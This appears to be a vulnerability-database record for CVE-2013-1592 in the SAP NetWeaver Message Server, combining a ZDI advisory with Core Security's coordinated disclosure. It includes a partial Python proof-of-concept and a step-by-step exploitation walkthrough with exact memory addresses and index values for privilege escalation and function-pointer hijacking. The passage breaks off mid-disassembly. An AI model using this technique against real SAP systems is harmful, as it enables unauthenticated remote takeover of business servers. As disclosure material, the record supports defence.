    1. PGP/GPG Keys

    This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1

    ZDI-12-104 : SAP Netweaver ABAP msg_server.exe Parameter Value Remote Code Execution Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-12-104 June 27, 2012

    • -- CVE ID:

    • -- CVSS: 10, AV:N/AC:L/Au:N/C:C/I:C/A:C

    • -- Affected Vendors: SAP

    • -- Affected Products: SAP NetWeaver

    • -- TippingPoint(TM) IPS Customer Protection: TippingPoint IPS customers have been protected against this vulnerability by Digital Vaccine protection filter ID 12407.

    • -- Vendor Response: SAP has issued an update to correct this vulnerability. More details can be found at: http://www.sdn.sap.com/irj/sdn/index?rid=/webcontent/uuid/c05604f6-4eb3-2d1 0-eea7-ceb666083a6a#section40

    • -- Disclosure Timeline: 2011-10-28 - Vulnerability reported to vendor 2012-06-27 - Coordinated public release of advisory

    • -- Credit: This vulnerability was discovered by:

    • e6af8de8b1d4b2b6d5ba2610cbf9cd38

    • -- About the Zero Day Initiative (ZDI): Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities.

    Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at:

    http://www.zerodayinitiative.com
    

    The ZDI is unique in how the acquired vulnerability information is used. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product.

    Our vulnerability disclosure policy is available online at:

    http://www.zerodayinitiative.com/advisories/disclosure_policy/
    

    Follow the ZDI on Twitter:

    http://twitter.com/thezdi
    

    -----BEGIN PGP SIGNATURE----- Version: PGP Desktop 10.2.0 (Build 1950) Charset: utf-8

    wsBVAwUBT+spXFVtgMGTo1scAQLsaAf7BDBhaaXu2xrm0nKo4KXmCuA091M40I4t uAkVEE7Zb4eFCtth3tsGSExGqDJp5LKfMe+KNfXUHMWcju+khxep8qfwxhnrtK2E 1doQXQmrqCJunJLKwReEa5MpcZGsYyantq0kCczWf5ZYlzLEsSk51GEYfvHx7WrR XFTr4krClMcDxi9nOxNDr/CqqGxxQlDgBsMD3EyzVQ92PBG8kTZHUAJwBPqh7Ku3 JqBWzVKDVVEsGxe7dlG4fXKIaDlCHaHJmsAr7+1Uw/DmfDOaTQMLRLvdGHY9Vpm6 wGIQD/1eAW66eLSBOeWXiRNHcorXRwu/SxQP8zIESkmWLZwKfZqbMA== =t/ct -----END PGP SIGNATURE-----

    Show details on source website

    {
      "affected_products": {
        "_id": null,
        "data": [
          {
            "_id": null,
            "model": "netweaver",
            "scope": null,
            "trust": 2.1,
            "vendor": "sap",
            "version": null
          },
          {
            "_id": null,
            "model": "netweaver",
            "scope": "eq",
            "trust": 1.8,
            "vendor": "sap",
            "version": "2004s"
          },
          {
            "_id": null,
            "model": "netweaver abap",
            "scope": null,
            "trust": 1.2,
            "vendor": "sap",
            "version": null
          },
          {
            "_id": null,
            "model": "netweaver",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "sap",
            "version": "7.01"
          },
          {
            "_id": null,
            "model": "netweaver",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "sap",
            "version": "7.02"
          },
          {
            "_id": null,
            "model": "netweaver",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "sap",
            "version": "7.30"
          },
          {
            "_id": null,
            "model": "netweaver",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "sap",
            "version": null
          },
          {
            "_id": null,
            "model": "netweaver",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "sap",
            "version": "7.01 sr1"
          },
          {
            "_id": null,
            "model": "netweaver",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "sap",
            "version": "7.02 sp06"
          },
          {
            "_id": null,
            "model": "netweaver",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "sap",
            "version": "7.30 sp04"
          },
          {
            "_id": null,
            "model": "netweaver abap null",
            "scope": "eq",
            "trust": 0.4,
            "vendor": "sap",
            "version": "*"
          },
          {
            "_id": null,
            "model": "netweaver 2004s",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sap",
            "version": "0"
          }
        ],
        "sources": [
          {
            "db": "IVD",
            "id": "29348194-1f62-11e6-abef-000c29c66e3d"
          },
          {
            "db": "IVD",
            "id": "29fdb3de-1f62-11e6-abef-000c29c66e3d"
          },
          {
            "db": "ZDI",
            "id": "ZDI-12-112"
          },
          {
            "db": "ZDI",
            "id": "ZDI-12-111"
          },
          {
            "db": "ZDI",
            "id": "ZDI-12-104"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2012-3434"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2012-3433"
          },
          {
            "db": "BID",
            "id": "57956"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2013-007127"
          },
          {
            "db": "NVD",
            "id": "CVE-2013-1592"
          }
        ]
      },
      "credits": {
        "_id": null,
        "data": "e6af8de8b1d4b2b6d5ba2610cbf9cd38",
        "sources": [
          {
            "db": "ZDI",
            "id": "ZDI-12-112"
          },
          {
            "db": "ZDI",
            "id": "ZDI-12-111"
          },
          {
            "db": "ZDI",
            "id": "ZDI-12-104"
          }
        ],
        "trust": 2.1
      },
      "cve": "CVE-2013-1592",
      "cvss": {
        "_id": null,
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "COMPLETE",
                "baseScore": 10.0,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 10.0,
                "id": "CVE-2013-1592",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "severity": "HIGH",
                "trust": 1.9,
                "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
                "version": "2.0"
              },
              {
                "acInsufInfo": null,
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "ZDI",
                "availabilityImpact": "COMPLETE",
                "baseScore": 9.0,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 10.0,
                "id": "ZDI-12-112",
                "impactScore": 8.5,
                "integrityImpact": "PARTIAL",
                "obtainAllPrivilege": null,
                "obtainOtherPrivilege": null,
                "obtainUserPrivilege": null,
                "severity": "HIGH",
                "trust": 0.7,
                "userInteractionRequired": null,
                "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:C",
                "version": "2.0"
              },
              {
                "acInsufInfo": null,
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "ZDI",
                "availabilityImpact": "COMPLETE",
                "baseScore": 10.0,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 10.0,
                "id": "ZDI-12-111",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "obtainAllPrivilege": null,
                "obtainOtherPrivilege": null,
                "obtainUserPrivilege": null,
                "severity": "HIGH",
                "trust": 0.7,
                "userInteractionRequired": null,
                "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
                "version": "2.0"
              },
              {
                "acInsufInfo": null,
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "ZDI",
                "availabilityImpact": "COMPLETE",
                "baseScore": 10.0,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 10.0,
                "id": "ZDI-12-104",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "obtainAllPrivilege": null,
                "obtainOtherPrivilege": null,
                "obtainUserPrivilege": null,
                "severity": "HIGH",
                "trust": 0.7,
                "userInteractionRequired": null,
                "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
                "version": "2.0"
              },
              {
                "accessComplexity": null,
                "accessVector": null,
                "authentication": null,
                "author": "IVD",
                "availabilityImpact": null,
                "baseScore": null,
                "confidentialityImpact": null,
                "exploitabilityScore": null,
                "id": "29348194-1f62-11e6-abef-000c29c66e3d",
                "impactScore": null,
                "integrityImpact": null,
                "severity": null,
                "trust": 0.2,
                "vectorString": null,
                "version": "unknown"
              },
              {
                "accessComplexity": null,
                "accessVector": null,
                "authentication": null,
                "author": "IVD",
                "availabilityImpact": null,
                "baseScore": null,
                "confidentialityImpact": null,
                "exploitabilityScore": null,
                "id": "29fdb3de-1f62-11e6-abef-000c29c66e3d",
                "impactScore": null,
                "integrityImpact": null,
                "severity": null,
                "trust": 0.2,
                "vectorString": null,
                "version": "unknown"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "nvd@nist.gov",
                "availabilityImpact": "HIGH",
                "baseScore": 9.8,
                "baseSeverity": "CRITICAL",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 3.9,
                "id": "CVE-2013-1592",
                "impactScore": 5.9,
                "integrityImpact": "HIGH",
                "privilegesRequired": "NONE",
                "scope": "UNCHANGED",
                "trust": 1.0,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.1"
              },
              {
                "attackComplexity": "Low",
                "attackVector": "Network",
                "author": "NVD",
                "availabilityImpact": "High",
                "baseScore": 9.8,
                "baseSeverity": "Critical",
                "confidentialityImpact": "High",
                "exploitabilityScore": null,
                "id": "CVE-2013-1592",
                "impactScore": null,
                "integrityImpact": "High",
                "privilegesRequired": "None",
                "scope": "Unchanged",
                "trust": 0.8,
                "userInteraction": "None",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2013-1592",
                "trust": 1.0,
                "value": "CRITICAL"
              },
              {
                "author": "NVD",
                "id": "CVE-2013-1592",
                "trust": 0.8,
                "value": "Critical"
              },
              {
                "author": "ZDI",
                "id": "ZDI-12-112",
                "trust": 0.7,
                "value": "HIGH"
              },
              {
                "author": "ZDI",
                "id": "ZDI-12-111",
                "trust": 0.7,
                "value": "HIGH"
              },
              {
                "author": "ZDI",
                "id": "ZDI-12-104",
                "trust": 0.7,
                "value": "HIGH"
              },
              {
                "author": "IVD",
                "id": "29348194-1f62-11e6-abef-000c29c66e3d",
                "trust": 0.2,
                "value": "HIGH"
              },
              {
                "author": "IVD",
                "id": "29fdb3de-1f62-11e6-abef-000c29c66e3d",
                "trust": 0.2,
                "value": "HIGH"
              },
              {
                "author": "VULMON",
                "id": "CVE-2013-1592",
                "trust": 0.1,
                "value": "HIGH"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "IVD",
            "id": "29348194-1f62-11e6-abef-000c29c66e3d"
          },
          {
            "db": "IVD",
            "id": "29fdb3de-1f62-11e6-abef-000c29c66e3d"
          },
          {
            "db": "ZDI",
            "id": "ZDI-12-112"
          },
          {
            "db": "ZDI",
            "id": "ZDI-12-111"
          },
          {
            "db": "ZDI",
            "id": "ZDI-12-104"
          },
          {
            "db": "VULMON",
            "id": "CVE-2013-1592"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2013-007127"
          },
          {
            "db": "NVD",
            "id": "CVE-2013-1592"
          }
        ]
      },
      "description": {
        "_id": null,
        "data": "A Buffer Overflow vulnerability exists in the Message Server service _MsJ2EE_AddStatistics() function when sending specially crafted SAP Message Server packets to remote TCP ports 36NN and/or 39NN in SAP NetWeaver 2004s, 7.01 SR1, 7.02 SP06, and 7.30 SP04, which could let a remote malicious user execute arbitrary code. SAP NetWeaver Contains a classic buffer overflow vulnerability.Information is acquired, information is falsified, and denial of service (DoS) May be in a state. Authentication is not required to exploit this vulnerability. The specific flaw exists within the msg_server.exe listening on 3900 by default. When the msg_server parses a message with opcode 0x43 and sub-opcode 0x04 it uses a user suplied size field to copy a string into a static sized stack buffer. The resulting buffer overflow can lead to remote code execution under the context of the process. Authentication is not required to exploit this vulnerability.The specific flaw exists within the way SAP NetWeaver handles packages with opcode 0x43. If a package with sub opcode 0x4 contains a long parameter value string NetWeaver will eventually write a \\x00 byte onto the stack to mark the end of the string. SAP NetWeaver has a defect in the message with the opcode 0x43. SAP NetWeaver is the technical foundation for SAP Business Suite solutions, SAP xApps composite applications, partner solutions, and custom applications. Msg_server.exe listens to port 3900 by default. Arbitrary code. \nSuccessfully exploiting these issues may allow an attacker to execute arbitrary code with the privileges of the user running the affected application or cause denial-of-service conditions. \nThe following products are affected:\nSAP Netweaver 2004s\nSAP Netweaver 7.01 SR1\nSAP Netweaver 7.02 SP06\nSAP Netweaver 7.30 SP04. \n\nThe vulnerability is due to a memory pointer error while processing certain packets by the affected software. Core Security - Corelabs Advisory\nhttp://corelabs.coresecurity.com/\n\nCORE-2012-1128\n\n\n1. *Advisory Information*\n\nTitle: SAP Netweaver Message Server Multiple Vulnerabilities\nAdvisory ID: CORE-2012-1128\nAdvisory URL:\nhttp://www.coresecurity.com/content/SAP-netweaver-msg-srv-multiple-vulnerabilities\nDate published: 2013-02-13\nDate of last update: 2013-02-13\nVendors contacted: SAP\nRelease mode: Coordinated release\n\n\n\n2. *Vulnerability Information*\n\nClass: Improper Validation of Array Index [CWE-129], Buffer overflow\n[CWE-119]\nImpact: Code execution, Denial of service\nRemotely Exploitable: Yes\nLocally Exploitable: No\nCVE Name: CVE-2013-1592, CVE-2013-1593\n\n\n\n3. By sending different messages,\nthe different vulnerabilities can be triggered. \n\n\n4. *Vulnerable packages*\n\n   . Older versions are probably affected too, but they were not checked. \n\n5. *Non-vulnerable packages*\n\n   . Vendor did not provide this information. \n\n6. *Vendor Information, Solutions and Workarounds*\n\nSAP released the security note 1800603 [2] regarding these issues. \n\n\n7. *Credits*\n\nVulnerability [CVE-2013-1592] was discovered by Martin Gallo and\nFrancisco Falcon, and additional research was performed by Francisco\nFalcon. Vulnerability [CVE-2013-1593] was discovered and researched by\nMartin Gallo from Core Security Consulting Services. The publication of\nthis advisory was coordinated by Fernando Miranda from Core Advisories\nTeam. \n\n\n8. *Technical Description / Proof of Concept Code*\n\nThe following python script is the main PoC that can be used to\nreproduce all vulnerabilities described below:\n\n/-----\nimport socket, struct\nfrom optparse import OptionParser\n\n# Parse the target options\nparser = OptionParser()\nparser.add_option(\"-d\", \"--hostname\", dest=\"hostname\", help=\"Hostname\",\ndefault=\"localhost\")\nparser.add_option(\"-p\", \"--port\", dest=\"port\", type=\"int\", help=\"Port\nnumber\", default=3900)\n(options, args) = parser.parse_args()\n\nclient_string = \u0027-\u0027+\u0027 \u0027*39\nserver_name = \u0027-\u0027+\u0027 \u0027*39\n\ndef send_packet(sock, packet):\n    packet = struct.pack(\"!I\", len(packet)) + packet\n    sock.send(packet)\n\ndef receive(sock):\n    length = sock.recv(4)\n    (length, ) = struct.unpack(\"!I\", length)\n    data = \"\"\n    while len(data)\u003clength:\n        data+= sock.recv(length)\n    return (length, data)\n\ndef initialize_connection(hostname, port):\n\n    # Connect\n    print \"[*] Connecting to\", hostname, \"port\", port\n    connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n    connection.connect((hostname, port))\n\n    # Send initialization packet\n    print \"[*] Conected, sending login request\"\n\n    init = \u0027**MESSAGE**\\x00\u0027 # eyecatcher\n    init+= \u0027\\x04\u0027 # version\n    init+= \u0027\\x00\u0027 # errorno\n    init+= client_string # toname\n    init+= \u0027\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\u0027 #\nmsgtype/reserved/key\n    init+= \u0027\\x01\\x08\u0027 # flag / iflag (MS_LOGIN_2)\n    init+= client_string # fromname\n    init+= \u0027\\x00\\x00\u0027 # padd\n    send_packet(connection, init)\n\n    # Receive response\n    print \"[*] Receiving login reply\"\n    (length, data) = receive(connection)\n\n    # Parsing login reply\n    server_name = data[4+64:4+64+40]\n\n    return connection\n\n# Main PoC body\nconnection = initialize_connection(options.hostname, options.port)\nsend_attack(connection)\n\n-----/\n\n\nIn the following subsections, we give the python code that can be added\nafter the script above in order to reproduce all vulnerabilities. \n\n\n8.1. Malicious\npackets are processed by the vulnerable function \u0027_MsJ2EE_AddStatistics\u0027\nin the \u0027msg_server.exe\u0027 module. \n\nThe vulnerable function \u0027_MsJ2EE_AddStatistics\u0027 receives a pointer to a\n\u0027MSJ2EE_HEADER\u0027 struct as its third parameter, which is fully controlled\nby the attacker. This struct type is defined as follows:\n\n/-----\n00000000 MSJ2EE_HEADER   struct ; (sizeof=0x28, standard type)\n00000000 senderclusterid dd ?\n00000004 clusterid       dd ?\n00000008 serviceid       dd ?\n0000000C groupid         dd ?\n00000010 nodetype        db ?\n00000011                 db ? ; undefined\n00000012                 db ? ; undefined\n00000013                 db ? ; undefined\n00000014 totallength     dd ?\n00000018 currentlength   dd ?\n0000001C currentoffset   dd ?\n00000020 totalblocks     db ?\n00000021 currentblock    db ?\n00000021\n00000022                 db ? ; undefined\n00000023                 db ? ; undefined\n00000024 messagetype     dd ?\n00000028 MSJ2EE_HEADER   ends\n-----/\n The \u0027_MsJ2EE_AddStatistics\u0027 function uses the \u0027serviceid\u0027 field of the\n\u0027MSJ2EE_HEADER\u0027 to calculate an index to write into the\n\u0027j2ee_stat_services\u0027 global array, without properly validating that the\nindex is within the boundaries of the array. On the other hand,\n\u0027j2ee_stat_services\u0027 is a global array of 256 elements of type\n\u0027MSJ2EE_STAT_ELEMENT\u0027:\n\n/-----\n.data:0090B9E0    ; MSJ2EE_STAT_ELEMENT j2ee_stat_services[256]\n.data:0090B9E0    j2ee_stat_services MSJ2EE_STAT_ELEMENT 100h dup(\u003c?\u003e)\n.data:0090B9E0    ; DATA XREF: _MsJ2EE_AddStatistics+24o\n.data:0090B9E0    ; _MsJ2EE_AddStatistics+4Co ... \n\n-----/\n This vulnerability can be used to corrupt arbitrary memory with\narbitrary values, with some restrictions. The following snippet shows\nthe vulnerable code within the \u0027_MsJ2EE_AddStatistics\u0027 function:\n\n/-----\nmov     edi, [ebp+pJ2eeHeader]\nmov     eax, [edi+MSJ2EE_HEADER.serviceid]              ;attacker\ncontrols MSJ2EE_HEADER.serviceid\nxor     ecx, ecx\ncmp     dword ptr j2ee_stat_total.totalMsgCount+4, ecx\nlea     esi, [eax+eax*8]\nlea     esi, j2ee_stat_services.totalMsgCount[esi*8]    ;using the index\nwithout validating array bounds\n\n-----/\n Since the \u0027serviceid\u0027 value is first multiplied by 9 and then it is\nmultiplied by 8, the granularity of the memory addresses that can be\ntargeted for memory corruption is 0x48 bytes, which is the size of the\n\u0027MSJ2EE_STAT_ELEMENT\u0027 struct:\n\n/-----\n00000000 MSJ2EE_STAT_ELEMENT struc ; (sizeof=0x48, standard type)\n00000000                                         ; XREF:\n.data:j2ee_stat_totalr\n00000000                                         ; .data:j2ee_stat_servicesr\n00000000 totalMsgCount   dq ?                    ; XREF:\n_MsJ2EE_AddStatistics+1Br\n00000000                                         ;\n_MsJ2EE_AddStatistics+2Fr ... \n00000008 totalMsgLength  dq ?                    ; XREF:\n_MsJ2EE_AddStatistics+192r\n00000008                                         ;\n_MsJ2EE_AddStatistics+19Br ... \n00000010 avgMsgLength    dq ?                    ; XREF:\n_MsJ2EE_AddStatistics+1C2w\n00000010                                         ;\n_MsJ2EE_AddStatistics+1C7w ... \n00000018 maxLength       dq ?                    ; XREF:\n_MsJ2EE_AddStatistics+161r\n00000018                                         ;\n_MsJ2EE_AddStatistics+16Er ... \n00000020 noP2PMessage    dq ?                    ; XREF:\n_MsJ2EE_AddStatistics:loc_44D442w\n00000020                                         ;\n_MsJ2EE_AddStatistics+158w ... \n00000028 noP2PRequest    dq ?                    ; XREF:\n_MsJ2EE_AddStatistics+144w\n00000028                                         ;\n_MsJ2EE_AddStatistics+14Aw ... \n00000030 noP2PReply      dq ?                    ; XREF:\n_MsJ2EE_AddStatistics+132w\n00000030                                         ;\n_MsJ2EE_AddStatistics+138w ... \n00000038 noBroadcastMessage dq ?                 ; XREF:\n_MsJ2EE_AddStatistics:loc_44D40Dw\n00000038                                         ;\n_MsJ2EE_AddStatistics+123w ... \n00000040 noBroadcastRequest dq ?                 ; XREF:\n_MsJ2EE_AddStatistics+10Fw\n00000040                                         ;\n_MsJ2EE_AddStatistics+115w ... \n00000048 MSJ2EE_STAT_ELEMENT ends\n\n-----/\n However, it is possible to use different combinations of the\n\u0027flag/iflag\u0027 values in the Message Server packet to gain more precision\nover the memory addresses that can be corrupted. Different combinations\nof \u0027flag/iflag\u0027 values provide different memory corruption primitives,\nas shown below:\n\n/-----\nAt this point:\n * ESI points to an arbitrary, attacker-controlled memory address\n * EBX == 1\n\n.text:0044D359                 movzx   eax, [ebp+msiflag]\n.text:0044D35D                 sub     eax, 0Ch\n.text:0044D360                 jz      short loc_44D37C\n.text:0044D362                 sub     eax, ebx\n.text:0044D364                 jnz     short loc_44D39D\n.text:0044D366                 cmp     [ebp+msflag], 2\n.text:0044D36A                 jnz     short loc_44D374\n.text:0044D36C                 add     [esi+40h], ebx  ; iflag=0xd,\nflag=2 =\u003e add 1 to [esi+0x40]\n.text:0044D36F                 adc     [esi+44h], ecx\n.text:0044D372                 jmp     short loc_44D39D\n.text:0044D374 ;\n---------------------------------------------------------------------------\n.text:0044D374\n.text:0044D374 loc_44D374:                             ; CODE XREF:\n_MsJ2EE_AddStatistics+7Aj\n.text:0044D374                 add     [esi+38h], ebx  ; iflag=0xd,\nflag=1 =\u003e add 1 to [esi+0x38]\n.text:0044D377                 adc     [esi+3Ch], ecx\n.text:0044D37A                 jmp     short loc_44D39D\n.text:0044D37C ;\n---------------------------------------------------------------------------\n.text:0044D37C\n.text:0044D37C loc_44D37C:                             ; CODE XREF:\n_MsJ2EE_AddStatistics+70j\n.text:0044D37C                 mov     al, [ebp+msflag]\n.text:0044D37F                 cmp     al, 3\n.text:0044D381                 jnz     short loc_44D38B\n.text:0044D383                 add     [esi+30h], ebx  ; iflag=0xc,\nflag=3 =\u003e add 1 to [esi+0x30]\n.text:0044D386                 adc     [esi+34h], ecx\n.text:0044D389                 jmp     short loc_44D39D\n.text:0044D38B ;\n---------------------------------------------------------------------------\n.text:0044D38B\n.text:0044D38B loc_44D38B:                             ; CODE XREF:\n_MsJ2EE_AddStatistics+91j\n.text:0044D38B                 cmp     al, 2\n.text:0044D38D                 jnz     short loc_44D397\n.text:0044D38F                 add     [esi+28h], ebx  ; iflag=0xc,\nflag=2 =\u003e add 1 to [esi+0x28]\n.text:0044D392                 adc     [esi+2Ch], ecx\n.text:0044D395                 jmp     short loc_44D39D\n.text:0044D397 ;\n---------------------------------------------------------------------------\n.text:0044D397\n.text:0044D397 loc_44D397:                             ; CODE XREF:\n_MsJ2EE_AddStatistics+9Dj\n.text:0044D397                 add     [esi+20h], ebx  ; iflag=0xc,\nflag=1 =\u003e add 1 to [esi+0x20]\n.text:0044D39A                 adc     [esi+24h], ecx\n\n[...]\n\n-----/\n And the following code excerpt is always executed within the\n\u0027_MsJ2EE_AddStatistics\u0027 function, providing two more memory corruption\nprimitives:\n\n/-----\n.text:0044D3B7                 add     [esi],\nebx                               ;add 1 to [esi]\n.text:0044D3B9                 adc     dword ptr [esi+4], 0\n.text:0044D3BD                 mov     eax,\n[edi+MSJ2EE_HEADER.totallength]     ;MSJ2EE_HEADER.totallength is fully\ncontrolled by the attacker\n.text:0044D3C0                 cdq\n.text:0044D3C1                 add     [esi+8],\neax                             ;add an arbitrary number to [esi+8]\n\n-----/\n This memory corruption vulnerability can be used by remote\nunauthenticated attackers to execute arbitrary code on vulnerable\ninstallations of SAP Netweaver, but it can also be abused to modify the\ninternal state of the vulnerable service in order to gain administrative\nprivileges within the SAP Netweaver Message Server. \n\nA client connected to the Message Server may have administrative\nprivileges or not. The Message Server holds a structure of type\n\u0027MSADM_s\u0027 for each connected client, which contains information about\nthat very connection. Relevant parts of the \u0027MSADM_s\u0027 struct type are\nshown below:\n\n/-----\n00000000 MSADM_s         struc ; (sizeof=0x538, standard type)\n00000000                                         ; XREF: .data:dummy_clientr\n00000000 client_type     dd ?                    ; enum MS_CLIENT_TYPE\n00000004 stat            dd ?                    ; enum MS_STAT\n00000008 connection_ID   dd ?\n0000000C status          db ?\n0000000D dom             db ?                    ; XREF: MsSFillCon+3Cw\n0000000E admin_allowed   db ?\n0000000F                 db ? ; undefined\n00000010 name            dw 40 dup(?)\n[...]\n00000534 _padding        db 4 dup(?)\n00000538 MSADM_s         ends\n\n-----/\n The \u0027admin_allowed\u0027 field at offset 0x0E is a boolean value that\nindicates whether the connected client has administrative privileges or\nnot. When a new client connects, the \u0027MsSLoginClient\u0027 function of the\nMessage Server sets the proper value for the \u0027admin_allowed\u0027 field in\nthe \u0027MSADM_s\u0027 struct instance associated with that client:\n\n/-----\n.text:004230DC\nloc_4230DC:                                                  ; CODE\nXREF: MsSLoginClient+AAAj\n.text:004230DC\n   ; MsSLoginClient+B26j\n.text:004230DC                 cmp     byte ptr [edi+0Eh],\n0                ; privileged client?\n.text:004230E0                 jnz     short\nloc_4230EA                     ; if yes, jump\n.text:004230E2                 mov     al, byte ptr\nms_admin_allowed        ; otherwise, grab the value of the\n\"ms_admin_allowed\" global variable... \n.text:004230E7                 mov     [edi+0Eh],\nal                        ; ...and save it to MSADM_s.admin_allowed\n\n-----/\n So if we manage to overwrite the value of the \u0027ms_admin_allowed\u0027 global\nvariable with a value different than 0, then we can grant administrative\nprivileges to our unprivileged connections. In SAP Netweaver\n\u0027msg_server.exe\u0027 v7200.70.18.23869, the \u0027ms_admin_allowed\u0027 global\nvariable is located at \u00270x008f17f0\u0027:\n\n/-----\n.data:008F17F0 ; int ms_admin_allowed\n.data:008F17F0 ms_admin_allowed dd ?                   ; DATA XREF:\nMsSSetMonitor+7Ew\n.data:008F17F0                                         ; MsSLoginClient+B62r\n\n-----/\n And the \u0027j2ee_stat_services\u0027 global array, which is the array that can\nbe indexed outside its bounds, is located at \u00270x0090b9e0\u0027:\n\n/-----\n.data:0090B9E0 ; MSJ2EE_STAT_ELEMENT j2ee_stat_services[256]\n.data:0090B9E0 j2ee_stat_services MSJ2EE_STAT_ELEMENT 100h dup(\u003c?\u003e)\n.data:0090B9E0                                         ; DATA XREF:\n_MsJ2EE_AddStatistics+24o\n.data:0090B9E0                                         ;\n_MsJ2EE_AddStatistics+4Co ... \n\n-----/\n So, by providing \u0027MSJ2EE_HEADER.serviceid == 0x038E3315\u0027, we will be\ntargeting \u00270x008F17C8\u0027 as the base address for memory corruption. Having\nin mind the different memory corruption primitives based on combinations\nof \u0027flag/iflag\u0027 fields described above, by specifying \u0027iflag == 0xC\u0027 and\n\u0027flag == 0x2\u0027 in our Message Server packet we will be able to add 1 to\n\u0027[0x008F17C8+0x28]\u0027, effectively overwriting the contents of\n\u00270x008F17F0\u0027 (\u0027ms_admin_allowed\u0027). After overwriting \u0027ms_admin_allowed\u0027,\nall of our future connections will have administrative privileges within\nthe Message Server. \n\nAfter gaining administrative privileges for our future connections,\nthere are at least two possible paths of exploitation:\n\n   1. Of\ncourse it is not mandatory to have administrative privileges in order to\noverwrite function pointers, but considering the limitation of\ntargetable addresses imposed by the little granularity of the memory\ncorruption, some of the most handy-to-exploit function pointers happened\nto be accessible just for administrative connections. \n   2. Modify the configuration and behavior of the server. That includes\nchanging Message Server\u0027s runtime parameters and enabling Monitor Mode\nin the affected server. \n\n8.1.1. *Gaining remote code execution by overwriting function pointers*\n\nHaving in mind that the granularity of the memory addresses that can be\ntargeted for memory corruption is not that flexible (0x48 bytes) and the\nlimited memory corruption primitives available, it takes some effort to\nfind a function pointer that can be overwritten with a useful value and\nwhich can be later triggered with a network packet. \n\nOne possibility is to overwrite one of the function pointers which are\nin charge of handling the modification of Message Server parameters:\n\n/-----\n.data:0087DED0 ; SHMPRF_CHANGEABLE_PARAMETER ms_changeable_parameter[58]\n\n; function pointers associated to the modification of the \"ms/max_sleep\"\nparameter\n.data:0087DED0 ms_changeable_parameter SHMPRF_CHANGEABLE_PARAMETER\n\u003coffset aMsMax_sleep, \\\n.data:0087DED0                                              offset\nMsSTestInteger, \\ ; \"rdisp/TRACE_PATTERN_2\"\n.data:0087DED0                                              offset\nMsSSetMaxSleep\u003e\n\n; function pointers associated to the modification of the \"ms/max_vhost\"\nparameter\n.data:0087DED0                 SHMPRF_CHANGEABLE_PARAMETER \u003coffset\naMsMax_vhost, \\\n.data:0087DED0                                              offset\nMsSTestInteger, \\                    ;\u003c-- we can overwrite this one\n.data:0087DED0                                              offset\nMsSSetMaxVirtHost\u003e\n\n[...]\n\n-----/\n By providing \u0027MSJ2EE_HEADER.serviceid == 0x038E1967\u0027 we can target\n\u00270x0087DED8\u0027 as the base address for memory corruption. In this case we\ncan use the memory corruption primitive at address \u00270x0044D3C1\u0027 that\nalways gets executed, which will allow us to add an arbitrary number\n(the value of \u0027MSJ2EE_HEADER.totallength\u0027) to \u0027[0x0087DED8+8]\u0027\neffectively overwriting the function pointer shown above\n(\u0027ms_changeable_parameter[1].set\u0027). \n\nAfter that we need to send a \u0027MS_SET_PROPERTY\u0027 request, specifying\n\u0027ms/max_vhost\u0027 as the name of the property to be changed. This\n\u0027MS_SET_PROPERTY\u0027 packet will make our overwritten function pointer to\nbe called from the \u0027MsSChangeParam\u0027 function:\n\n/-----\n.text:00404DB3 loc_404DB3:                             ; CODE XREF:\nMsSChangeParam+CDj\n.text:00404DB3                 lea     esi, [edi+edi*2]\n.text:00404DB6                 mov     edi, [ebp+pvalue]\n.text:00404DB9                 add     esi, 